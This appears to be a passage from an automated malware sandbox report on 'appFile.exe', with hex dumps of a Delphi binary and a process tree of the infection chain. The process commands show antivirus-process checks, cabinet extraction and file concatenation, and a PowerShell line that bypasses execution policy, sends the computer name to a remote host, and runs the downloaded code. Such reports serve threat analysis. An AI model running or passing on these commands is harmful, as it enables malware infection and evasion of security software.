                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 00 00 00 00 0f 55 6e 73 61 66 65 41 74 74 72 69 62 75 74 65 00 00 94 21 40 00 07 0f 55 6e 73 61 66 65 41 74 74 72 69 62 75 74 65 78 21 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 18 22 40 00 00 00 00 00 00 00 00 00 00 00 00 00 34 22 40 00 00 00 00 00 18 22 40 00 00 00 00 00 1e 22 40 00 08 00 00 00 c4 1f 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 00 00 00 00 11 56 6f 6c 61 74 69 6c 65 41 74 74 72 69 62 75 74 65 34 22 40 00 07 11 56 6f 6c 61 74 69 6c 65 41 74 74 72 69 62 75 74 65 18 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 b8 22 40
                                                                                                                                      Data Ascii: @@}@}@}@UnsafeAttribute!@UnsafeAttributex!@4 @System"@4"@"@"@@~@@@@@@@@}@}@}@VolatileAttribute4"@VolatileAttribute"@4 @System"@
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 74 02 00 02 00 09 e8 89 40 00 08 50 75 6c 73 65 41 6c 6c 00 00 00 00 00 00 01 0a 9c 1f 40 00 07 41 4f 62 6a 65 63 74 02 00 02 00 ec 26 40 00 0f 0a 49 49 6e 74 65 72 66 61 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 20 27 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 e8 26 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 01 00 ff ff 02 00 00 54 27 40 00 0f 09 49 44 69 73 70 61 74 63 68 e8 26 40 00 01 00 04 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 04 00 ff ff 02 00 00 00 00 cc 83 44 24 04 f8 e9 81 ca 00 00 83 44 24 04 f8 e9 9f ca 00 00 83 44 24 04 f8 e9 b1 ca 00 00 cc 85 27 40 00 8f 27 40 00 99 27 40 00 01 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: t@PulseAll@AObject&@IInterfaceFSystem '@IEnumerable&@SystemT'@IDispatch&@FSystemD$D$D$'@'@'@
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 6f 75 6e 74 02 00 cc 10 40 00 02 00 00 00 02 05 46 6c 61 67 73 02 00 9c 10 40 00 04 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 9c 10 40 00 08 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 00 11 40 00 0c 00 00 00 02 04 44 61 74 61 02 00 a8 2b 40 00 10 00 00 00 02 06 42 6f 75 6e 64 73 02 00 02 00 00 00 00 84 2c 40 00 0e 0a 54 56 61 72 52 65 63 6f 72 64 08 00 00 00 00 00 00 00 00 02 00 00 00 00 11 40 00 00 00 00 00 02 07 50 52 65 63 6f 72 64 02 00 00 11 40 00 04 00 00 00 02 07 52 65 63 49 6e 66 6f 02 00 02 00 00 00 00 cc 2c 40 00 0e 08 54 56 61 72 44 61 74 61 10 00 00 00 00 00 00 00 00 20 00 00 00 cc 10 40 00 00 00 00 00 02 05 56 54 79 70 65 02 00 cc 10 40 00 02 00 00 00 02 09 52 65 73 65 72 76 65 64 31 02 00 cc 10 40 00 04 00 00 00 02 09 52 65
                                                                                                                                      Data Ascii: ount@Flags@ElementSize@LockCount@Data+@Bounds,@TVarRecord@PRecord@RecInfo,@TVarData @VType@Reserved1@Re
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 40 00 00 00 00 00 02 08 56 56 61 72 69 61 6e 74 02 00 00 11 40 00 00 00 00 00 02 0a 56 49 6e 74 65 72 66 61 63 65 02 00 00 11 40 00 00 00 00 00 02 0b 56 57 69 64 65 53 74 72 69 6e 67 02 00 b4 2a 40 00 00 00 00 00 02 06 56 49 6e 74 36 34 02 00 00 11 40 00 00 00 00 00 02 0e 56 55 6e 69 63 6f 64 65 53 74 72 69 6e 67 02 00 54 11 40 00 00 00 00 00 02 0a 5f 52 65 73 65 72 76 65 64 31 02 00 b4 10 40 00 04 00 00 00 02 05 56 54 79 70 65 02 00 02 00 00 00 00 00 00 0c 32 40 00 0e 0b 54 50 74 72 57 72 61 70 70 65 72 04 00 00 00 00 00 00 00 00 01 00 00 00 a0 2a 40 00 00 00 00 00 00 05 56 61 6c 75 65 02 00 02 00 06 00 0a 28 9c 4a 00 06 43 72 65 61 74 65 00 00 00 00 00 00 01 00 54 11 40 00 06 41 56 61 6c 75 65 02 00 02 00 0a c0 f5 40 00 06 43 72 65 61 74 65 00 00 00 00
                                                                                                                                      Data Ascii: @VVariant@VInterface@VWideString*@VInt64@VUnicodeStringT@_Reserved1@VType2@TPtrWrapper*@Value(JCreateT@AValue@Create
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 28 9c 4a 00 0a 52 65 61 6c 6c 6f 63 4d 65 6d 03 00 08 32 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 08 32 40 00 01 00 06 4f 6c 64 50 74 72 02 00 00 54 11 40 00 02 00 07 4e 65 77 53 69 7a 65 02 00 02 00 34 00 28 9c 4a 00 07 46 72 65 65 4d 65 6d 03 00 00 00 00 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 08 32 40 00 01 00 03 50 74 72 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 cc 4b 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66
                                                                                                                                      Data Ascii: (JReallocMem2@Self2@OldPtrT@NewSize4(JFreeMemSelf2@Ptrb(JCopySelfK@Src@StartIndex2@Dest@Countb(JCopySelf
                                                                                                                                      2024-12-27 09:21:51 UTC1369INData Raw: 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 28 4d 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 60 4d 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53
                                                                                                                                      Data Ascii: 2@Dest@Countb(JCopySelf2@Src(M@Dest@StartIndex@Countb(JCopySelf`M@Src@StartIndex2@Dest@Countb(JCopyS


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:04:21:02
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Users\user\Desktop\appFile.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\appFile.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:37'872'978 bytes
                                                                                                                                      MD5 hash:7C498ECA1B725E8A85FEF298184CCBB9
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:04:21:03
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Shore Shore.cmd & Shore.cmd
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:04:21:03
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:04:21:05
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:tasklist
                                                                                                                                      Imagebase:0x70000
                                                                                                                                      File size:79'360 bytes
                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:04:21:05
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                                                      Imagebase:0x6a0000
                                                                                                                                      File size:29'696 bytes
                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:04:21:06
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:tasklist
                                                                                                                                      Imagebase:0x70000
                                                                                                                                      File size:79'360 bytes
                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:04:21:06
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                      Imagebase:0x6a0000
                                                                                                                                      File size:29'696 bytes
                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:04:21:06
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:cmd /c md 723356
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:04:21:06
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:extrac32 /Y /E Guitar
                                                                                                                                      Imagebase:0xb70000
                                                                                                                                      File size:29'184 bytes
                                                                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:04:21:07
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:findstr /V "Principle" Portions
                                                                                                                                      Imagebase:0x6a0000
                                                                                                                                      File size:29'696 bytes
                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:04:21:07
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:cmd /c copy /b ..\Requirements + ..\Ul + ..\Pupils + ..\Vista + ..\Sound + ..\Shelf F
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:04:21:07
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:Ted.com F
                                                                                                                                      Imagebase:0x630000
                                                                                                                                      File size:947'288 bytes
                                                                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:04:21:08
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                      Imagebase:0xcf0000
                                                                                                                                      File size:28'160 bytes
                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:04:21:48
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                                      Imagebase:0x7ff70f330000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:04:21:48
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:04:22:10
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe"
                                                                                                                                      Imagebase:0xc60000
                                                                                                                                      File size:12'178'693 bytes
                                                                                                                                      MD5 hash:1EBAB72F39900F4DB9D82A4850B32ABD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 13%, ReversingLabs
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:04:22:11
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp" /SL5="$4041A,11205210,845824,C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe"
                                                                                                                                      Imagebase:0xc00000
                                                                                                                                      File size:3'367'424 bytes
                                                                                                                                      MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:04:22:12
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENT
                                                                                                                                      Imagebase:0xc60000
                                                                                                                                      File size:12'178'693 bytes
                                                                                                                                      MD5 hash:1EBAB72F39900F4DB9D82A4850B32ABD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:04:22:13
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp" /SL5="$5041A,11205210,845824,C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENT
                                                                                                                                      Imagebase:0xbf0000
                                                                                                                                      File size:3'367'424 bytes
                                                                                                                                      MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:04:22:47
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\timeout.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"timeout" 9
                                                                                                                                      Imagebase:0x7ff74fa00000
                                                                                                                                      File size:32'768 bytes
                                                                                                                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:24
                                                                                                                                      Start time:04:22:47
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:25
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                      Imagebase:0x7ff7d8b00000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:26
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                      Imagebase:0x7ff649280000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:28
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:find /I "wrsa.exe"
                                                                                                                                      Imagebase:0x7ff6b8ea0000
                                                                                                                                      File size:17'920 bytes
                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                      Imagebase:0x7ff7d8b00000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:30
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:31
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                      Imagebase:0x7ff649280000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:32
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:find /I "opssvc.exe"
                                                                                                                                      Imagebase:0x7ff6b8ea0000
                                                                                                                                      File size:17'920 bytes
                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:33
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                      Imagebase:0x7ff7d8b00000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:34
                                                                                                                                      Start time:04:22:56
                                                                                                                                      Start date:27/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
